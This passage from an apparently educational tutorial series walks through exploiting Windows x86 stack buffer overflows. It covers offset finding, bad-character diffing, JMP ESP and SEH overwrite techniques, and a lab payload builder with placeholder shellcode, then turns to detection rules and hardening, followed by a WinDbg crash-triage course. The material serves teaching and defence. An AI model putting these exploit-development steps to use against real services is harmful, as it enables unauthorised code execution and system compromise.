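            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


PATTERN = de_bruijn(b"abcdefghijklmnopqrstuvwxyz", 4)[:3000]


def find_offset(eip_value: int, pattern: bytes = PATTERN) -> int:
    """Offset of the little-endian dword that landed in EIP, or -1 if absent."""
    return pattern.find(struct.pack("<I", eip_value))


print(PATTERN[:16])               # b'aaaabaaacaaadaaa'
print(find_offset(0x61616167))    # 24
```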

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(b for b in range(1, 256))   # skip \x00 first
# Send, then in the debugger: d esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.
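The diff step is easy to script once you have the dumped bytes (for example, copied from a db esp L100 listing and converted to bytes). This sketch, with a hypothetical function name, reports the first sent byte that is missing or altered in memory. Stopping at the first mismatch mirrors the manual loop, since a bad character often truncates or shifts everything after it.

```python
from typing import Optional

BADCHAR_TEST = bytes(range(1, 256))      # \x01..\xff; \x00 is excluded up front


def first_bad_char(sent: bytes, observed: bytes) -> Optional[int]:
    """Return the first sent byte that is missing or altered in observed, else None."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return expected
    return None


# Simulated service that truncates input at a newline
observed = BADCHAR_TEST[: BADCHAR_TEST.index(0x0A)]
print(hex(first_bad_char(BADCHAR_TEST, observed)))   # 0xa

# Remove the bad char, resend, and repeat until the dump matches
retry = bytes(b for b in BADCHAR_TEST if b != 0x0A)
```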

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytes  Instruction    Use
FF E4         JMP ESP        Classic return trampoline
FF D4         CALL ESP       Equivalent effect
FF E5         JMP EBP        When EBP points near the buffer
EB 06         Short JMP +6   Next-SEH jump-over gadget

Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.
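mona.py automates the opcode hunt, but the core idea is a plain byte search over a module's executable bytes. This sketch scans a buffer (for example, .text bytes extracted with objcopy) for the trampoline opcodes in the table, adds the section's load address, and rejects candidate addresses whose little-endian encoding contains a bad character. The function name, base address, and sample bytes are hypothetical, and it ignores what mona also reports (ASLR, SafeSEH, and rebase flags per module).

```python
import struct

TRAMPOLINES = {
    b"\xff\xe4": "JMP ESP",
    b"\xff\xd4": "CALL ESP",
    b"\xff\xe5": "JMP EBP",
}


def find_trampolines(code: bytes, base: int, bad_chars: bytes = b"\x00\x0a\x0d"):
    """Yield (address, mnemonic) for each trampoline whose address is bad-char-free."""
    for opcode, name in TRAMPOLINES.items():
        start = 0
        while (idx := code.find(opcode, start)) != -1:
            addr = base + idx
            if not any(b in bad_chars for b in struct.pack("<I", addr)):
                yield addr, name
            start = idx + 1


code = b"\x90" * 0x10 + b"\xff\xe4" + b"\x90" * 4 + b"\xff\xd4"
for addr, name in find_trampolines(code, 0x62501100):
    print(f"0x{addr:08x}  {name}")
```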


Figure: The six-step exploit development loop progresses from controlled crash to precise EIP hijack, ending in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

Mitigation           Mechanism                                                                     Bypass vector (teaching)
/GS (stack cookie)   Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue     SEH overwrite before the cookie check; cookie leak
SafeSEH              PE table of valid SEH handlers; the dispatcher checks the handler against it  Trampoline in a module not compiled /SAFESEH
SEHOP                Validates the SEH chain reaches FinalExceptionHandler at dispatch             Chain spoofing; non-opted-in modules
DEP/NX (/NXCOMPAT)   Stack and heap pages are marked non-executable                                ROP chain (follow-on topic)
ASLR (/DYNAMICBASE)  Randomizes image/stack/heap base                                              Partial overwrites, info leaks (follow-on topic)

/GS computes a per-module master cookie at startup via __security_init_cookie(), stored in that module's .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.


Figure: Windows layers compiler-enforced mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR); each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses __try/__except, its EXCEPTION_REGISTRATION_RECORD sits in the stack frame near the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler, bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.
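Why POP–POP–RET lands on Next SEH: when the dispatcher calls the handler, the stack holds the handler's return address followed by its four arguments (ExceptionRecord, EstablisherFrame, ContextRecord, DispatcherContext), and EstablisherFrame points at the overwritten registration record. This sketch models that stack as a Python list and executes the gadget; all addresses are made-up illustrative values.

```python
def run_pop_pop_ret(stack: list) -> int:
    """Execute POP r32; POP r32; RET on a stack modeled as a list (index 0 = [esp])."""
    esp = 0
    esp += 1              # POP: discards the return address into the dispatcher
    esp += 1              # POP: discards the ExceptionRecord pointer
    eip = stack[esp]      # RET: loads EstablisherFrame into EIP
    return eip


def short_jmp_target(addr: int, disp: int) -> int:
    """EB xx is 2 bytes; the signed 8-bit displacement is relative to the next instruction."""
    if disp >= 0x80:
        disp -= 0x100
    return addr + 2 + disp


NSEH_ADDR = 0x0019FFDC    # illustrative address of the overwritten Next SEH field
stack_at_dispatch = [
    0x77A1B2C3,           # return address into the dispatcher (illustrative)
    0x0019F9A0,           # arg 1: ExceptionRecord
    NSEH_ADDR,            # arg 2: EstablisherFrame, i.e. the registration record itself
    0x0019F9F0,           # arg 3: ContextRecord
    0x0019F970,           # arg 4: DispatcherContext
]

eip = run_pop_pop_ret(stack_at_dispatch)
assert eip == NSEH_ADDR                                # execution lands on Next SEH
assert short_jmp_target(eip, 0x06) == NSEH_ADDR + 8    # EB 06 skips NSEH (4) + SE Handler (4)
```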

SafeSEH breaks this by validating the handler against the PE's registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced in Vista SP1 and Server 2008, enabled by default on server editions but opt-in on Vista and Windows 7 clients) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.


Figure: SEH-based attack chain. Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

  1. No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
  2. /GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

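Reference WinDbg commands. WinDbg treats ; as a command separator, so the text after ; below is annotation only; leave it out when typing:

0:000> g                      ; run until crash
0:000> r                      ; read registers (expect EIP = 41414141)
0:000> d esp                  ; dump stack at ESP, find your buffer
0:000> .load msec.dll         ; load the !exploitable extension
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline

mona.py commands, shown in Immunity Debugger syntax (under WinDbg with pykd, invoke them as !py mona <command>):

!mona findmsp                          ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing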

8. Common Attacker Techniques

Technique               Description
Linear stack smash      Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline
SEH overwrite           Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS
Non-SafeSEH trampoline  Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH
Bad-char-safe encoding  Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d)
Egghunter / staging     Use a small first stage to locate or download a larger payload
VirtualProtect via ROP  Call VirtualProtect from a ROP chain to mark the shellcode region executable, bypassing DEP

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.


9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

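  • WER Event ID 1000 (Application Error, Application log): logs the faulting application and module, the exception code (0xC0000005 for an access violation), the fault offset, and the faulting process ID. An access violation in a network-facing service whose faulting module is reported as unknown, or whose fault offset looks like filler data such as 0x41414141, is high-fidelity.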
  • WER Event ID 1001 — records the crash bucket and any captured dump.
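A minimal sketch of triaging Event ID 1000 text, assuming the rendered message contains the usual "Faulting module name:", "Exception code:" and "Fault offset:" lines. Message formats vary across Windows versions, so treat the regexes, the sample message, and the filler heuristic as assumptions to tune against your own logs.

```python
import re

FIELDS = {
    "module": re.compile(r"Faulting module name:\s*([^,\r\n]+)"),
    "code": re.compile(r"Exception code:\s*(0x[0-9a-fA-F]+)"),
    "offset": re.compile(r"Fault offset:\s*(0x[0-9a-fA-F]+)"),
}


def parse_wer_1000(message: str) -> dict:
    """Extract module, exception code and fault offset (None when a field is missing)."""
    out = {}
    for name, rx in FIELDS.items():
        m = rx.search(message)
        out[name] = m.group(1).strip() if m else None
    return out


def looks_like_overflow(fields: dict) -> bool:
    """Access violation whose offset is repeated printable filler or whose module is unknown."""
    if (fields.get("code") or "").lower() != "0xc0000005":
        return False
    if fields.get("offset") is None:
        return False
    raw = (int(fields["offset"], 16) & 0xFFFFFFFF).to_bytes(4, "little")  # low 32 bits
    filler = len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F               # e.g. 41414141 ('AAAA')
    return filler or (fields.get("module") or "").lower() == "unknown"


sample = (  # illustrative message, not captured from a real host
    "Faulting application name: vulnservice.exe, version: 0.0.0.0, time stamp: 0x4ce7bb8c\n"
    "Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000\n"
    "Exception code: 0xc0000005\n"
    "Fault offset: 0x41414141\n"
)
print(looks_like_overflow(parse_wer_1000(sample)))   # True
```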

Relevant Sysmon events for follow-on activity:

Event ID  Name                Relevance
1         Process Creation    Shells/payloads spawned from a crashed service
3         Network Connection  Reverse-shell / C2 egress from shellcode
7         Image Loaded        Unexpected ws2_32.dll load by a non-network service
8         CreateRemoteThread  Thread injection by shellcode
10        Process Access      Shellcode calling OpenProcess on lsass.exe
11        File Created        Dropped payloads / second-stage binaries
25        Process Tampering   Process hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated access-violation crashes of a network-facing service (legacy count()/timeframe aggregation; vulnservice.exe is a placeholder name):

title: Repeated Application Crash on Network-Facing Service
status: experimental
logsource:
  product: windows
  service: application
detection:
  selection:
    Provider_Name: 'Application Error'
    EventID: 1000
    Data|contains|all:
      - 'vulnservice.exe'
      - 'c0000005'
  timeframe: 1m
  condition: selection | count() > 3
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.t1190
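Backends implement timeframe aggregation differently (tumbling or sliding windows), so it helps to know what the rule is meant to compute. This Python sketch, with a hypothetical (timestamp, application) event shape, applies a sliding one-minute window and reports whenever one application exceeds three crashes.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=1)
THRESHOLD = 3          # alert when count() > 3, matching the rule


def crash_bursts(events):
    """events: iterable of (timestamp, app_name) for Event ID 1000 access violations.

    Yields (timestamp, app_name, count) whenever an app exceeds THRESHOLD
    crashes inside a sliding WINDOW ending at that event.
    """
    recent = defaultdict(deque)
    for ts, app in sorted(events):
        q = recent[app]
        q.append(ts)
        while ts - q[0] > WINDOW:      # evict crashes older than the window
            q.popleft()
        if len(q) > THRESHOLD:
            yield ts, app, len(q)


t0 = datetime(2024, 1, 1, 12, 0, 0)
events = [(t0 + timedelta(seconds=10 * i), "vulnservice.exe") for i in range(5)]
for ts, app, n in crash_bursts(events):
    print(ts.time(), app, n)
```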

Hardening Steps

  1. Force WDEG / Exploit Protection on network-facing services: mandatory DEP, force-ASLR, SEHOP, and heap integrity validation via Set-ProcessMitigation.
  2. Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
  3. Verify SEHOP: HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
  4. Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
  5. Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
  6. Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
  7. Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

Tool       Description                                                 Link
WinDbg     Kernel/user debugger; !exploitable crash triage             microsoft.com
x64dbg     User-mode debugger for live frame inspection                x64dbg.com
mona.py    Immunity/WinDbg plugin for offsets, trampolines, bad chars  github.com
pwntools   Python exploit-dev framework (cyclic, p32)                  pwntools.com
ROPgadget  Gadget discovery for DEP-bypass chains                      github.com
Ghidra     Static disassembly / decompilation for code review          ghidra-sre.org
Sysmon     Endpoint telemetry for post-exploitation behavior           microsoft.com

11. MITRE ATT&CK Mapping

Technique                               MITRE ID   Detection
Exploit Public-Facing Application       T1190      WER Event ID 1000 crash bursts; WAF oversized-input alerts
Exploitation for Privilege Escalation   T1068      Service running as SYSTEM crashing then spawning children
Exploitation for Client Execution       T1203      Client app (parser/player) crash + child process via Sysmon Event ID 1
Endpoint DoS: Application Exploitation  T1499.004  Repeated crash/restart loops (4689, WER 1000)
Exploit Protection (mitigation)         M1050      DEP/ASLR/SEHOP enforced via WDEG (plus /GS at build time); WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.


Summary

  • A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
  • The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
  • /GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
  • DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
  • Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.


WinDbg Crash Course: Navigation, Commands, and Workflow for Exploit Devs

Objective: Learn to drive WinDbg against a crashing Windows target — configure symbols, attach in all three modes, read a fault from first principles, master every breakpoint type, inspect the heap, and use the dx data model and Time Travel Debugging — so you can triage crashes and build the workflow exploitation labs depend on.


1. WinDbg Classic vs. WinDbg Preview — Choosing Your Tool

Two editions share the same dbgeng.dll engine but differ in shell and capabilities.

Feature                WinDbg Classic        WinDbg Preview (WinDbgX)
Distribution           Windows SDK / WDK     Microsoft Store (UWP)
Layout model           Workspace .wsp files  Modern ribbon UI
Time Travel Debugging  No                    Yes
Underlying engine      dbgeng.dll            dbgeng.dll

Use WinDbg Preview as your daily driver — the ribbon, source overlay, and Time Travel Debugging (TTD) make crash triage faster. Keep Classic available for headless scripting on stripped-down lab VMs where the Store runtime is unavailable. Kernel debugging over serial/network (bcdedit /debug on) is a separate discipline; this tutorial stays user-mode.


2. Symbol Configuration Done Right

Without symbols, every other command degrades to raw addresses. A PDB (.pdb) file maps human-readable source elements — function names, struct layouts, locals — to addresses in the compiled binary. Symbols are generated at build/link time.

Set the symbol path before you launch via the _NT_SYMBOL_PATH environment variable, or in-session with .sympath.

0:000> .sympath cache*C:\Symbols;srv*https://msdl.microsoft.com/download/symbols
0:000> .reload /f
0:000> lm

.reload loads symbols lazily; .reload /f forces immediate load. In lm output, (deferred) only means symbols have not been loaded yet; (export symbols) or (no symbols) means resolution failed and the debugger fell back to the export table or to nothing. Diagnose failures with !sym noisy, which prints every path the loader probes, then silence it with !sym quiet.

Command           Purpose
.sympath          Display / set / append the symbol path
.reload /f        Force immediate symbol load
!sym noisy        Verbose symbol-loader trace
lm                List modules and symbol-load state
x module!pattern  Resolve a symbol name to an address
ln address        Find the nearest named symbol to an address

3. Attaching to a Target: Three Modes

Mode       How                      Use case
Launch     windbg.exe target.exe    Debug from process start
Attach     windbg.exe -p <PID>      Inspect a running process
Open dump  windbg.exe -z crash.dmp  Post-mortem analysis

On launch and attach the debugger stops at an initial break before user code runs. The exception model is two-stage: the debugger sees a first-chance exception first, and only if the target's own handlers do not resolve it does the second-chance exception fire. Control which exceptions break execution with sxe (break on first chance), sxd (break only on second chance), and sxi (ignore). In the listings that follow, a ; followed by prose is an annotation: WinDbg treats ; as a command separator, so leave annotations out when typing.

0:000> sxe av          ; break on first-chance access violations
0:000> sxe ld:user32   ; break when user32 loads
0:000> g

The sxe ld / g idiom is the canonical way to break exactly when a target module maps into the address space — essential for setting breakpoints on code that is not yet present.


Figure: WinDbg sees every exception twice: first-chance before the target's handlers run, second-chance if none of them resolve it.

4. The Essential Command Vocabulary

Execution control, register/stack inspection, and memory display form the core loop.

Command      What it does
g (F5)       Continue execution of the debuggee
p / t        Step over / step into
gu           Execute until the current function returns
pt / wt      Step to next ret / trace-and-watch a call tree
r            Display all general-purpose registers
k / kb / kp  Stack trace; kb adds first 3 args; kp adds typed parameters
lm / u / uf  List modules / disassemble / disassemble full function

Memory display and edit commands follow a consistent type-suffix grammar:

Command                What it does
db / dw / dd / dq      Display bytes / words / DWORDs / QWORDs
da / du                Display ASCII / Unicode string
dp / dv                Display pointer-sized values / local variables
dt module!Type [addr]  Dump a typed struct (e.g. dt ntdll!_PEB @$peb)
!peb / !teb            Dump the Process / Thread Environment Block
eb / ew / ed / eq      Edit byte / word / DWORD / QWORD
ea / eu                Write ASCII / Unicode characters to an address
s -d start end value   Search memory for a pattern over a range
!address               Show virtual mapping, permissions, and region type

A typical inspection sequence at a fault reads registers, walks the stack, then dumps memory at the stack pointer:

0:000> r
0:000> k
0:000> dd esp L8
0:000> dt ntdll!_EXCEPTION_RECORD @$exr

5. Crash Triage: Reading a Fault from First Principles

When a target faults, the debugger lands on the faulting instruction with an exception record describing the cause. !analyze -v automates first-pass triage, emitting the faulting IP, the decoded exception, the stack, and a probable root cause.

0:000> !analyze -v
FAULTING_IP:
 vuln!process_packet+0x4a
0040124a 8801            mov     byte ptr [ecx],al
EXCEPTION_RECORD:  (.exr -1)
ExceptionCode: c0000005 (Access violation)
ExceptionAddress: 0040124a
EXCEPTION_PARAMETER[1]: 41414141     ; attacker-controlled write target
STACK_TEXT:
0019f7c0 41414141 41414141 41414141 vuln!process_packet+0x4a

Read it methodically: FAULTING_IP is the instruction that trapped; the [ecx] write target of 41414141 (“AAAA”) signals attacker-controlled memory. A corrupted STACK_TEXT full of 41414141 indicates a saved-return-address overwrite. Decode any NTSTATUS with !error 0xC0000005. The MSEC !exploitable extension applies heuristics to estimate exploitability classification — load it with .load msec.dll first.
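The first two exception parameters carry most of the triage signal. For STATUS_ACCESS_VIOLATION, the EXCEPTION_RECORD documentation defines ExceptionInformation[0] as 0 for a read, 1 for a write, and 8 for a user-mode DEP violation, with ExceptionInformation[1] holding the inaccessible address. This small sketch turns those values into a first-pass label; the "address looks attacker-controlled" heuristic (four identical, non-0x00/0xFF bytes) is an assumption, not a !exploitable rule.

```python
ACCESS_KIND = {0: "read", 1: "write", 8: "execute (DEP)"}


def classify_av(code: int, params: list) -> str:
    """Label an access violation from ExceptionCode and ExceptionInformation[0..1]."""
    if code != 0xC0000005 or len(params) < 2:
        return "not an access violation"
    kind = ACCESS_KIND.get(params[0], f"unknown({params[0]})")
    addr = params[1]
    raw = (addr & 0xFFFFFFFF).to_bytes(4, "little")
    attacker_like = len(set(raw)) == 1 and raw[0] not in (0x00, 0xFF)
    label = f"{kind} AV at 0x{addr:08x}"
    return label + (" - address looks attacker-controlled" if attacker_like else "")


print(classify_av(0xC0000005, [1, 0x41414141]))
# write AV at 0x41414141 - address looks attacker-controlled
```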

For Structured Exception Handler overwrites, !exchain walks the handler chain:

0:000> !exchain
0019ffdc: 41414141     ; handler overwritten with attacker bytes
Invalid exception stack at 41414141

A handler pointer of 41414141 confirms an SEH overwrite primitive.


Figure: Crash triage flow (access violation, !analyze -v, faulting IP, stack corruption check, SEH chain walk, exploitability classification). A structured triage flow turns a raw access violation into a root-caused, exploitability-classified crash record.

6. Breakpoint Mastery

WinDbg distinguishes software breakpoints (bp, patch an int 3) from hardware breakpoints (ba, debug registers — they trap reads/writes/executes without modifying code).

Command                  What it does
bp module!func           Software breakpoint, resolved immediately
bu module!func           Unresolved; arms when the module loads
bm module!pattern*       Breakpoint on all symbols matching a pattern
ba r4 addr               Hardware breakpoint on read or write of 4 bytes (ba e1 = execute, ba w4 = write)
bp /1 addr               One-shot breakpoint, auto-clears after firing
bl / bd N / be N / bc *  List / disable / enable / clear all breakpoints

Attach a command string that runs automatically on each break, chaining with ;:

0:000> bu kernel32!WriteFile "k; r eax; g"
0:000> ba w4 0019f7c0 "!address @$ip; g"

Use a pass count to skip the first hits on a hot path, and bp /w with a data-model expression for true conditional breakpoints:

0:000> bp `vuln!net.c:385` 5 "!teb; k; g"
0:000> bp /w "(int)@ecx == 0x41414141" vuln!process_packet

The bp /w form breaks only when the expression evaluates true — far cheaper than breaking and manually re-continuing.


7. Heap Internals Inspection

Heap corruption — use-after-free, overflow into adjacent chunks — is where most modern exploitation lives. The !heap extension family exposes chunk headers and allocation state.

Command            What it does
!heap -s           Summary of all heaps
!heap -flt s 0x80  Show all allocations of size 0x80
!heap -p -all      Walk all allocations in all heaps
!heap -l           Detect leaked heap blocks

0:000> !heap -s
0:000> !heap -flt s 0x80      ; isolate chunks of a target size class
0:000> !heap -p -all          ; correlate chunks to allocation call sites

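Filtering by size class isolates the chunks an attacker grooms; !heap -p -all ties each block back to its allocation stack, which is how you identify the object straddling a corrupted boundary. Those allocation stacks are only recorded if page heap or the user-mode stack trace database was enabled for the target (with gflags) before it ran.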


8. The dx Data Model and Scripting

The dx (Debugger Object Model) command exposes debugger state as queryable objects with a LINQ-style syntax — ideal for filtering large outputs and building conditions.

0:000> dx @$curprocess.Modules
0:000> dx @$curthread.Stack.Frames.Select(f => f.Attributes.InstructionOffset)
0:000> dx Debugger.Utility.Control.ExecuteCommand("k")

Debugger.Utility.Control.ExecuteCommand runs any legacy command from inside a dx query, enabling hybrid scripts that mix object queries with classic extensions. For JavaScript automation, .scriptload script.js loads a script and runs its initializeScript function, while .scriptrun script.js loads it and then also calls its invokeScript function.


9. Time Travel Debugging for Exploit Devs

TTD records a full execution trace you can replay forward and backward, then query as data. It is the single biggest accelerator for root-causing memory corruption, because you can step backward from the crash to the write that caused it. Recording requires running WinDbg (WinDbgX) as Administrator, and TTD is user-mode only in the current public build.

Recording produces a .run trace file. Open it and navigate with the reverse-execution commands:

Command                                    What it does
!tt 0:0                                    Jump to a trace position (here, rewind to the start)
g- / p- / t-                               Reverse continue / step / trace
dx @$cursession.TTD.Calls("module!func")   Query every call to a function across the trace

0:000> !tt 0:0
0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap")
0:000> g-

The workflow for a heap-corruption case: record to crash, query RtlAllocateHeap/RtlFreeHeap calls to find the freed chunk, set a write watchpoint on it, and g- backward to the exact instruction that wrote out of bounds.
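The write-watchpoint-plus-g- step answers one question: what was the most recent write, earlier in the trace than the current position, that overlapped the watched range? A minimal Python model of that query, assuming a hypothetical list of (position, address, size) write events such as you might collect from a TTD memory-access query; TTD positions are written as two hex numbers, major:minor, and are compared numerically here.

```python
from typing import List, Optional, Tuple

# (TTD position "major:minor" in hex, address, size): hypothetical transcribed events
Write = Tuple[str, int, int]


def pos_key(pos: str) -> Tuple[int, int]:
    """Turn a TTD position such as '3F:1C' into a sortable (major, minor) pair."""
    major, minor = pos.split(":")
    return int(major, 16), int(minor, 16)


def last_write_before(writes: List[Write], current: str,
                      lo: int, hi: int) -> Optional[Write]:
    """Model 'ba w' + 'g-': the latest write before `current` overlapping [lo, hi)."""
    here = pos_key(current)
    hits = [w for w in writes
            if pos_key(w[0]) < here and w[1] < hi and lo < w[1] + w[2]]
    return max(hits, key=lambda w: pos_key(w[0]), default=None)


writes = [  # illustrative values, not real trace output
    ("10:0", 0x5000, 4),
    ("2A:5", 0x5080, 8),
    ("3F:1C", 0x5088, 4),
    ("40:2", 0x9000, 4),
]
hit = last_write_before(writes, "41:0", 0x5080, 0x5108)
print(hit[0], hex(hit[1]))  # 3F:1C 0x5088
```

Calling it again from the returned position steps one write further back, which mirrors issuing g- repeatedly.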


TTD lets you reverse-execute from the crash back to the exact instruction that corrupted the heap chunk.

10. Automation and Crash Triage Pipelines

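For fuzzer integration, drive the debugger headlessly with -c startup commands and -logo logging (cdb.exe, the console debugger that ships alongside WinDbg, accepts the same switches without a GUI). A minimal triage script: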

sxe av; g; !analyze -v; .logclose; q

Wrap it from any orchestrator:

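import re
import subprocess

# sxe av: break on access violations; !analyze -v classifies; .logclose flushes; q quits.
cmds = 'sxe av; g; !analyze -v; .logclose; q'
# -c runs the startup commands, -logo writes (overwrites) the session log.
subprocess.run(['windbg.exe', '-c', cmds, '-logo', 'out.txt', 'target.exe'])

with open('out.txt', encoding='utf-8', errors='ignore') as f:
    log = f.read()

# The faulting instruction is printed on the line after the FAULTING_IP: header.
m = re.search(r'FAULTING_IP:\s*\n(.+)', log)
print('Fault:', m.group(1).strip() if m else 'no crash')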

.logopen / .logclose tee session output to disk for later parsing, turning every fuzzer crash into a structured triage record.
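Many fuzzer inputs land on the same bug, so the next step after collecting logs is usually deduplication. !analyze -v prints a FAILURE_BUCKET_ID line that summarizes the crash signature; a minimal Python sketch that groups a directory of logs by that value, assuming one log file per crash under a hypothetical crashes/ directory.

```python
import re
from collections import defaultdict
from pathlib import Path
from typing import Dict, List

# !analyze -v prints a line such as "FAILURE_BUCKET_ID:  <signature>".
BUCKET_RE = re.compile(r"^\s*FAILURE_BUCKET_ID:\s*(\S+)", re.MULTILINE)


def bucket_of(log_text: str) -> str:
    """Return the crash signature, or UNKNOWN if no !analyze -v output is present."""
    m = BUCKET_RE.search(log_text)
    return m.group(1) if m else "UNKNOWN"


def bucket_logs(log_dir: str, pattern: str = "*.txt") -> Dict[str, List[str]]:
    """Group crash logs by bucket so each distinct bug is triaged once."""
    buckets: Dict[str, List[str]] = defaultdict(list)
    for path in sorted(Path(log_dir).glob(pattern)):
        text = path.read_text(encoding="utf-8", errors="ignore")
        buckets[bucket_of(text)].append(path.name)
    return dict(buckets)


for bucket, files in bucket_logs("crashes").items():  # hypothetical log directory
    print(f"{len(files):4d}  {bucket}")
```

Logs that land in UNKNOWN are worth a manual look: they usually mean the target never crashed or the debugger exited before !analyze -v ran.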


11. Common Attacker Techniques

WinDbg is a defensive and authorized-testing tool, but the APIs it relies on overlap heavily with adversary tradecraft — which is precisely why studying it teaches you the telemetry attackers generate.

Technique                Description
Process attach           OpenProcess(PROCESS_ALL_ACCESS) + DebugActiveProcess mirror injection-stager behavior
Memory read/write        ReadProcessMemory / WriteProcessMemory underpin both debugging and code patching
Module enumeration       lm, !peb, !teb mirror malware’s runtime module/OS reconnaissance
Exploitability triage    !analyze -v, !exploitable, !exchain rank which crashes are worth weaponizing
TTD trace harvesting     .run files capture sensitive in-memory data during analysis

An attacker reading LSASS or another process with the same primitives WinDbg uses generates near-identical handle and memory-access telemetry, so the defender who understands WinDbg understands the indicators.
